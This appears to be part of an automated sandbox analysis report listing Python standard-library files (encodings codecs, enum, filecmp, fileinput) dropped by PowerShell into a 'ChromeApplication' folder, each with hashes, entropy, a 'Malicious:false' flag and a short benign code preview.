                                                                                                                                                                                                  SSDEEP:24:JDmSEHV0yWcBx1yWcB8MufQcBxCb+nh5cBiiUQWSJzWSmi1GcBX9ZKj9jQJxlTpf:JaSAE1uzWbp6SJ6SL1tBTKpQJxHf
                                                                                                                                                                                                  MD5:C939A021963EDD01807CDF57B08163D7
                                                                                                                                                                                                  SHA1:5549D399865582B0A802D950E8B3B7FA4474D726
                                                                                                                                                                                                  SHA-256:1D1372CF4F46E2F99820070B78563BD3EEED60FFC43A932B483CC7918F3DA5E9
                                                                                                                                                                                                  SHA-512:8BF2450C2A44B4ED7B9E901C425AD7BA114E9B946E69FF0DB36644DBD82BF85266EB487C373179F50DB983CE0A51A03E52F43539F92DBC9BF69D39F5DBAE7753
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python 'unicode-escape' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.unicode_escape_encode.. decode = codecs.unicode_escape_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.unicode_escape_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. def _buffer_decode(self, input, errors, final):.. return codecs.unicode_escape_decode(input, errors, final)....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. def decode(self, input, errors='strict'):.. return codecs.unicode_escape_decode(input, errors, False

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_16.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5391
                                                                                                                                                                                                  Entropy (8bit):4.3113332789517
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:JgcgiEqCubuY5lRlE2GRCGEFdIXv5lLoQyLt6ofvBUpzdft0iL7+9WiV9lkip8IB:aruCouolRaRCRIhlL7yLt7vYfLL72blt
                                                                                                                                                                                                  MD5:2867E58C229EB66CE2FC8704F1E380D2
                                                                                                                                                                                                  SHA1:57CB01EF3A3CD16BCCB814C86A3B6DABC379B7C4
                                                                                                                                                                                                  SHA-256:FD85A9D634B6F3868D6777E2B0367643571B3E61111B87C79F65DF3F57C7ACB3
                                                                                                                                                                                                  SHA-512:7E08E1F9FFCF68123DA6B5B531ED0040AE652FC00DCCEAFCD2B4AF121CA627ECF7A4F9DC6AEB44EF8C040414F27BB3AC0B31FAB030A7BB6D5C2491CA5161CC12
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python 'utf-16' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs, sys....### Codec APIs....encode = codecs.utf_16_encode....def decode(input, errors='strict'):.. return codecs.utf_16_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. codecs.IncrementalEncoder.__init__(self, errors).. self.encoder = None.... def encode(self, input, final=False):.. if self.encoder is None:.. result = codecs.utf_16_encode(input, self.errors)[0].. if sys.byteorder == 'little':.. self.encoder = codecs.utf_16_le_encode.. else:.. self.encoder = codecs.utf_16_be_encode.. return result.. return self.encoder(input, self.errors)[0].... def reset(self):.. codecs.IncrementalEncoder.reset(self).. self.encoder = None.... de

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_16_be.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1079
                                                                                                                                                                                                  Entropy (8bit):4.776020747108792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:JMSEVyWuq1IjaatMufQBb+OyW80kzyWEzryW79ZKj9kJxFplR:JMS1q1I2aCuqEzSzhTKOJxTz
                                                                                                                                                                                                  MD5:71C7BEDB2761CE2BCD7D4AB422CF4F40
                                                                                                                                                                                                  SHA1:9BE6A38B88716031ED83825611C3B010284C3677
                                                                                                                                                                                                  SHA-256:16329B46D794F4D13B38A7A2540002E72E176D85237872CA3A24BF3C90D7665C
                                                                                                                                                                                                  SHA-512:D72E83FB2FD71EED49EC72F9B99B87A0341B2923091C6D92B5DEAB7C380418F8BFB868EE064A76FD321EBD2C2D8560A2559D76401730F199870374B4B555E35B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python 'utf-16-be' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....encode = codecs.utf_16_be_encode....def decode(input, errors='strict'):.. return codecs.utf_16_be_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_16_be_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_16_be_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_16_be_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_16_be_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-16-be',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_16_le.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1079
                                                                                                                                                                                                  Entropy (8bit):4.763394951954305
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:J+SEVyWMq1IjP8atMufQfb+OyWPy0kzyWuzryWP19ZKj9qJxFplR:J+SHq1I4aCuYizgzXTKQJxTz
                                                                                                                                                                                                  MD5:E34C5A24FE48A17FCBFC4335389F6C4E
                                                                                                                                                                                                  SHA1:4FD9811F688CE9ADDF6B1315600707C46BA02D56
                                                                                                                                                                                                  SHA-256:6D3B04F3ABD9FB6151FEE5CA0426C2E7ED2677EF1358C269747FF8946FFC02B9
                                                                                                                                                                                                  SHA-512:2FE8D6111B3A81F509BB67AB452CEDF9721501222F16E3CCDC4E412BF7BB2383317269ED4059E2C1E82434EF6830794A6EB8AA7DDA2E6230290A8027E601BB10
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python 'utf-16-le' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....encode = codecs.utf_16_le_encode....def decode(input, errors='strict'):.. return codecs.utf_16_le_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_16_le_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_16_le_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_16_le_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_16_le_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-16-le',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_32.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5279
                                                                                                                                                                                                  Entropy (8bit):4.273683297819166
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:g+tqC0buY5lRlzeRCGEFdIPv5lLoQwLt6ofvBUpzdf/0iL7+zykV9bkMpZ/ut1fA:DkCSuolRMRCRMhlL7wLt7vYfVL7qbbpd
                                                                                                                                                                                                  MD5:616CF58B40671374C8A7BB69A3EBC565
                                                                                                                                                                                                  SHA1:2F71BE2439277B332CC255B7E0B0F11AFF9AB090
                                                                                                                                                                                                  SHA-256:97F6038F368954DD48BE9B5FA41B1395A71FCA0271B0FEA69F8E16F9F6633775
                                                                                                                                                                                                  SHA-512:43D921D34974BA356A0AE3B650516B7E1108DBFB10618BAC22A0485A5AD1B55D73B1090F77C69C67ACD0C3BE231E4DBD02A32040BCF88FA646610C91F819F341
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""..Python 'utf-32' Codec.."""..import codecs, sys....### Codec APIs....encode = codecs.utf_32_encode....def decode(input, errors='strict'):.. return codecs.utf_32_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. codecs.IncrementalEncoder.__init__(self, errors).. self.encoder = None.... def encode(self, input, final=False):.. if self.encoder is None:.. result = codecs.utf_32_encode(input, self.errors)[0].. if sys.byteorder == 'little':.. self.encoder = codecs.utf_32_le_encode.. else:.. self.encoder = codecs.utf_32_be_encode.. return result.. return self.encoder(input, self.errors)[0].... def reset(self):.. codecs.IncrementalEncoder.reset(self).. self.encoder = None.... def getstate(self):.. # state info we return to the caller:.. # 0: stream is in natural order for th

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_32_be.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):967
                                                                                                                                                                                                  Entropy (8bit):4.64840879615024
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:g6VyWEq1IjsatMufQ3b+OyWi0kzyWWzryWF9ZKj9KJxFplR:gRq1IQaCusKzwzXTKYJxTz
                                                                                                                                                                                                  MD5:85519A8598572F85931621ACCB60DB87
                                                                                                                                                                                                  SHA1:2B7912D3F1D4042A0778C22C068A18A9AD00B990
                                                                                                                                                                                                  SHA-256:A3698A68287CC78323117D14BE3B0B40F46289A850EB06AA9A5328D44B2A30EF
                                                                                                                                                                                                  SHA-512:AAF1FB52FCB6BCE9D3E026BD4866149D48F5E2434A735DED9165C65A5FD4D0186CC44715A797A890F4E01C9E4CB44453BCA8D4BA6993B93811739CA80E86F5FA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""..Python 'utf-32-be' Codec.."""..import codecs....### Codec APIs....encode = codecs.utf_32_be_encode....def decode(input, errors='strict'):.. return codecs.utf_32_be_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_32_be_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_32_be_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_32_be_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_32_be_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-32-be',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReader,.. streamwriter=StreamWriter,.. )..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_32_le.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):967
                                                                                                                                                                                                  Entropy (8bit):4.629711576470682
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:gEVyWWq1IjyatMufQpb+OyWE0kzyWczryWj9ZKj95WJxFplR:g5q1IeaCuG8zizhTKGJxTz
                                                                                                                                                                                                  MD5:6647D201D3BAD385BD7897DF02EC45ED
                                                                                                                                                                                                  SHA1:AADB093709162E4B5F9ABA0590235AFE3D96246B
                                                                                                                                                                                                  SHA-256:945AF03D1DA591640DE7176BEF879658594B399AC7BBE564D790893CA7B38A73
                                                                                                                                                                                                  SHA-512:CF7F010E0E199BD017636894D7B1B060E21D2ADF13D81BAE710046889D48604A01D05F10F1B1ACA8033F19E8254857A93334CBBF471E55FD58BD4888B190CE62
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""..Python 'utf-32-le' Codec.."""..import codecs....### Codec APIs....encode = codecs.utf_32_le_encode....def decode(input, errors='strict'):.. return codecs.utf_32_le_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_32_le_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_32_le_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_32_le_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_32_le_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-32-le',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReader,.. streamwriter=StreamWriter,.. )..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_7.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):984
                                                                                                                                                                                                  Entropy (8bit):4.635801396513396
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:JWyVyW6q1IjWatMufQVb+OyWg0kzyW4zryWH9ZKj9+5JxFplR:JWjq1IiaCu24zmzNTK85JxTz
                                                                                                                                                                                                  MD5:ECFD453A49D4C576E4F189CF6B23376C
                                                                                                                                                                                                  SHA1:70B61C19024F20BBC476C11D3CE95AA484225D09
                                                                                                                                                                                                  SHA-256:1BE7FC4C85EDAAB33427D3F1230D56B8A4B0D75566F726D9DFC50FACEA36688B
                                                                                                                                                                                                  SHA-512:F6AB67F17F586459362581DD894D3CAF62D67E283C075DFCD15B2D03E0AC79FF53E31853900A9EFF5E8778ECEC7AEE7A945EA55368D663FF82F657E7950B4A51
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python 'utf-7' Codec....Written by Brian Quinlan (brian@sweetapp.com)..."""..import codecs....### Codec APIs....encode = codecs.utf_7_encode....def decode(input, errors='strict'):.. return codecs.utf_7_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_7_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_7_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_7_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_7_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-7',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReader,.. streamwriter=StreamWriter,.. )..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_8.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1047
                                                                                                                                                                                                  Entropy (8bit):4.729776202710733
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:JgqSEVyW7yEq1IjPatMufQ7y3b+OyWR0kzyW7yWzryWc9ZKj9/JxFplR:J1SKyEq1IjaCuwyr5z1yWzeTKZJxTz
                                                                                                                                                                                                  MD5:F932D95AFCAEA5FDC12E72D25565F948
                                                                                                                                                                                                  SHA1:2685D94BA1536B7870B7172C06FE72CF749B4D29
                                                                                                                                                                                                  SHA-256:9C54C7DB8CE0722CA4DDB5F45D4E170357E37991AFB3FCDC091721BF6C09257E
                                                                                                                                                                                                  SHA-512:A10035AE10B963D2183D31C72FF681A21ED9E255DDA22624CBAF8DBED5AFBDE7BE05BB719B07573DE9275D8B4793D2F4AEF0C0C8346203EEA606BB818A02CAB6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python 'utf-8' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....encode = codecs.utf_8_encode....def decode(input, errors='strict'):.. return codecs.utf_8_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_8_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_8_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_8_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_8_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-8',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReade

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_8_sig.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4263
                                                                                                                                                                                                  Entropy (8bit):4.440495855479389
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:JGJ9aCCIFyqPICuY5lRlDrwzRC35v5lLo3YCaLt3AvBNiLD1Lg9Ft1QYxTKB3:8J9vCIFTwCuolR9rwzRCJhlLIaLtQv+d
                                                                                                                                                                                                  MD5:99B035D3C80B206F86E525A4DB7704D3
                                                                                                                                                                                                  SHA1:5006274B7CC61564CF6839AC070631F788FD5FCB
                                                                                                                                                                                                  SHA-256:21A95BB95448F2F064F08AA2C89E843B87A20A5A13C45C6C47C288F2BE5219A4
                                                                                                                                                                                                  SHA-512:B19A6876EB04CD5739F99C7C0A07B2269E2EB9A72199A656149DD2B87A25EB0F9945CD9CAEFD2B7DA8756386468294493C6353645CB055343F008CDCFF115F4F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python 'utf-8-sig' Codec..This work similar to UTF-8 with the following changes:....* On encoding/writing a UTF-8 encoded BOM will be prepended/written as the.. first three bytes.....* On decoding/reading if the first three bytes are a UTF-8 encoded BOM, these.. bytes will be skipped..."""..import codecs....### Codec APIs....def encode(input, errors='strict'):.. return (codecs.BOM_UTF8 + codecs.utf_8_encode(input, errors)[0],.. len(input))....def decode(input, errors='strict'):.. prefix = 0.. if input[:3] == codecs.BOM_UTF8:.. input = input[3:].. prefix = 3.. (output, consumed) = codecs.utf_8_decode(input, errors, True).. return (output, consumed+prefix)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. codecs.IncrementalEncoder.__init__(self, errors).. self.first = 1.... def encode(self, input, final=False):.. if self.first:.. self.first = 0.. r

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\uu_codec.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2954
                                                                                                                                                                                                  Entropy (8bit):4.703525654326454
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:XnE2/bf1OV5FPdLLlKTOARSMoxz1AFPLpLGpW7NRp6/df1Fo141RzuwBvIvPTKrf:XESf1OVjPpUOAoMot8P1HJydf/omXu+P
                                                                                                                                                                                                  MD5:C62CEDA36D6B362A2250094DFA2EF15A
                                                                                                                                                                                                  SHA1:D96068DC9790D38B44F3DA580F134EF1C7288B33
                                                                                                                                                                                                  SHA-256:3991C68ACBB5CE946C6BA71CCB044FBBB449F9EAC9B76262456537EAEBEF9340
                                                                                                                                                                                                  SHA-512:6C0296817CA26680858DB78B38BF1D1BE39FC7EDB7894979251EA3281496E7447914A12C9C5B41A1EAD12610DD472C00FF9752816FE30CFF4298C083DA29B3A3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Python 'uu_codec' Codec - UU content transfer encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com). Some details were..adapted from uu.py which was written by Lance Ellinghouse and..modified by Jack Jansen and Fredrik Lundh..."""....import codecs..import binascii..from io import BytesIO....### Codec APIs....def uu_encode(input, errors='strict', filename='<data>', mode=0o666):.. assert errors == 'strict'.. infile = BytesIO(input).. outfile = BytesIO().. read = infile.read.. write = outfile.write.... # Remove newline chars from filename.. filename = filename.replace('\n','\\n').. filename = filename.replace('\r','\\r').... # Encode.. write(('begin %o %s\n' % (mode & 0o777, filename)).encode('ascii')).. chunk = read(45).. while chunk:.. write(binascii.b2a_uu(chunk)).. chunk = read(45).. write(b' \nend\n').... return (outfile.getvalue(), len(input))....def uu_decode(input, error

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\zlib_codec.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2281
                                                                                                                                                                                                  Entropy (8bit):4.555875191198799
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:XLDD4W1AIejO1AI73101ouY51wdP7z0I51wzD5x6Ftx0+HvIvPTKyJxTPH:XHD4W/ejO/73OauY5y7z/58uXnA3TKyD
                                                                                                                                                                                                  MD5:77C7F92636D3B55460B5E1AFD451D5DB
                                                                                                                                                                                                  SHA1:DCE6B27A30BC191F9CFA34DEA5A27682AE274DE4
                                                                                                                                                                                                  SHA-256:9B660028249BDB7E9B80AF1D5432BF0C90B132A6D0DD205E2DED2A3B3275B728
                                                                                                                                                                                                  SHA-512:93E2E6197321CAD932F88F234EBFAD23F88ABB00C18D2F80C5711D15119CA4D0D1AB261156D6E9A7E1FEEA8A30675759823A3353F353551BA887101CDBBFA98D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Python 'zlib_codec' Codec - zlib compression encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import zlib # this codec needs the optional zlib module !....### Codec APIs....def zlib_encode(input, errors='strict'):.. assert errors == 'strict'.. return (zlib.compress(input), len(input))....def zlib_decode(input, errors='strict'):.. assert errors == 'strict'.. return (zlib.decompress(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return zlib_encode(input, errors).. def decode(self, input, errors='strict'):.. return zlib_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. assert errors == 'strict'.. self.errors = errors.. self.compressobj = zlib.compressobj().... def encode(self, input, final=False):.. if final:.. c

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\enum.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):40884
                                                                                                                                                                                                  Entropy (8bit):4.212002396918681
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:kSaCRtqc9awL8yzjb4IuSzIcvYFgvHEo0FBbefYu4V+QOxTCe7IpW3W+KP4qxkIr:kShRtqcdp43cvcZFBNFdaI5h/EiAi
                                                                                                                                                                                                  MD5:F87CAC79AB835BAC55991134E9C64A35
                                                                                                                                                                                                  SHA1:63D509BF705342A967CDD1AF116FE2E18CD9346F
                                                                                                                                                                                                  SHA-256:303AFEA74D4A1675A48C6A8D7C4764DA68DBEF1092DC440E4BF3C901F8155609
                                                                                                                                                                                                  SHA-512:9A087073E285F0F19AB210ECEEFB9E2284FFFD87C273413E66575491023A8DCB4295B7C25388F1C2E8E16A74D3B3BFF13EC725BE75DC827541E68364E3A95A6D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import sys..from types import MappingProxyType, DynamicClassAttribute......__all__ = [.. 'EnumMeta',.. 'Enum', 'IntEnum', 'Flag', 'IntFlag',.. 'auto', 'unique',.. ]......def _is_descriptor(obj):.. """.. Returns True if obj is a descriptor, False otherwise... """.. return (.. hasattr(obj, '__get__') or.. hasattr(obj, '__set__') or.. hasattr(obj, '__delete__').. )....def _is_dunder(name):.. """.. Returns True if a __dunder__ name, False otherwise... """.. return (.. len(name) > 4 and.. name[:2] == name[-2:] == '__' and.. name[2] != '_' and.. name[-3] != '_'.. )....def _is_sunder(name):.. """.. Returns True if a _sunder_ name, False otherwise... """.. return (.. len(name) > 2 and.. name[0] == name[-1] == '_' and.. name[1:2] != '_' and.. name[-2:-1] != '_'.. )....def _is_priv

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\filecmp.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10491
                                                                                                                                                                                                  Entropy (8bit):4.527930173678213
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:S4TNBBnKhVsBrA7go4ly/vF1AUCzRUYqRvmC14ziCI6mM/MXiYPWEiOVtYhV+BdI:SWZvoF/vrierHCJmM/MltcV+T9x9FxS
                                                                                                                                                                                                  MD5:5BFEBC272A65E815586C0B477529A23B
                                                                                                                                                                                                  SHA1:ABFDCD66A595B8E4FBD983F02DB3E3E17EFBE7D2
                                                                                                                                                                                                  SHA-256:DF39A8D67A582E8E4F54B665B7FD5D87E0754982AC5FBDD6CED3E09039CDAE8D
                                                                                                                                                                                                  SHA-512:04B93F5EAD263FF9889AE3CF97950263559EA8F454594A21F2041973B0DD340564DF5A4F1BEDFA313FDD25BBAB0013ED29FAA3FF911CE9A931C3C3631F4407B8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Utilities for comparing files and directories.....Classes:.. dircmp....Functions:.. cmp(f1, f2, shallow=True) -> int.. cmpfiles(a, b, common) -> ([], [], []).. clear_cache()...."""....import os..import stat..from itertools import filterfalse..from types import GenericAlias....__all__ = ['clear_cache', 'cmp', 'dircmp', 'cmpfiles', 'DEFAULT_IGNORES']...._cache = {}..BUFSIZE = 8*1024....DEFAULT_IGNORES = [.. 'RCS', 'CVS', 'tags', '.git', '.hg', '.bzr', '_darcs', '__pycache__']....def clear_cache():.. """Clear the filecmp cache.""".. _cache.clear()....def cmp(f1, f2, shallow=True):.. """Compare two files..... Arguments:.... f1 -- First file name.... f2 -- Second file name.... shallow -- treat files as identical if their stat signatures (type, size,.. mtime) are identical. Otherwise, files are considered different.. if their sizes or contents differ. [default: True].... Return value:.... True if the files are the same

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\fileinput.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16904
                                                                                                                                                                                                  Entropy (8bit):4.324042229701554
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:aPuyi2h40tVqXZqRPUJeRalQFufMR2RgzRXhRWRhRHR8p8ido/5V6E0j0ZP5Od/C:muy7h40QZqR/nFufe8gNXXcXx4oVPZPn
                                                                                                                                                                                                  MD5:53551CACE03FF1ECBAF2BB02E0F07F1E
                                                                                                                                                                                                  SHA1:06C4B1BA4C943CC08A468E5603AEFE7FAEAEFD20
